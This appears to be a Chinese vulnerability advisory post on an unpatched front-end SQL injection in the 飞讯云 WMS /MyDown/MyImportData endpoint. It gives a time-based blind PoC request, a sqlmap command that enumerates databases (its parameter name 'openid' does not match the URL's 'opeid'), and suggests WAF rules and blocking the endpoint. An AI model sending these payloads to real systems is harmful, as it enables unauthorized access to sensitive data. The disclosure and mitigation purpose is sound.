【飞讯云MyImportData前台SQL注入已复现】

一、漏洞简介

飞讯云-WMS 接口:/MyDown/MyImportData?opeid=1处存在前台SQL注入漏洞,攻击者可以通过sql注入攻击获取到敏感数据,账号信息等,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

二、poc利用

复制代码
GET /MyDown/MyImportData?opeid=1%27+WAITFOR+DELAY+'0:0:10'-- HTTP/1.1
Host: {host}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: language=zh-CN; ASP.NET_SessionId=fszg0ra1zc3tgeepea3p4ujz
Connection: close

sqlmap验证:

复制代码
python sqlmap.py -u http://xxxx.xxx.xxx:8080/MyDown/MyImportData?opeid=1 -p openid --dbs

三、临时措施

厂商未发布补丁,建议:

1、waf设置规则防护

2、禁止对/MyDown/MyImportData?opeid=1接口的访问

相关推荐
辣椒思密达1 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
satadriver3 小时前
手工加载API函数
安全
SLD_Allen4 小时前
Purple Llama:Meta开源的LLM安全“紫队”工具箱
安全·开源·llama
Sirius Wu4 小时前
OpenClaw Cron安全约束完整详解
人工智能·安全·aigc
数据知道4 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
Gyr04 小时前
关于证书站捡洞这一档事
安全·web安全
其实防守也摸鱼4 小时前
渗透--损坏的对象级别鉴权漏洞(Broken Object Level Authorization, BOLA)
大数据·网络·数据库·学习·tcp/ip·安全·安全威胁分析
IT小白杨5 小时前
多账号环境稳定性由什么决定:指纹、网络、存储如何共同决定账号安全
网络·安全·开源软件·业界资讯·指纹浏览器
明哥聊AI5 小时前
大模型安全攻防实战:从越狱到Prompt注入的攻防全解析(2026最新)
安全·prompt
Sagittarius_A*5 小时前
Web 渗透实战:服务器系统识别、端口与中间件全量探测
服务器·网络安全·中间件·渗透测试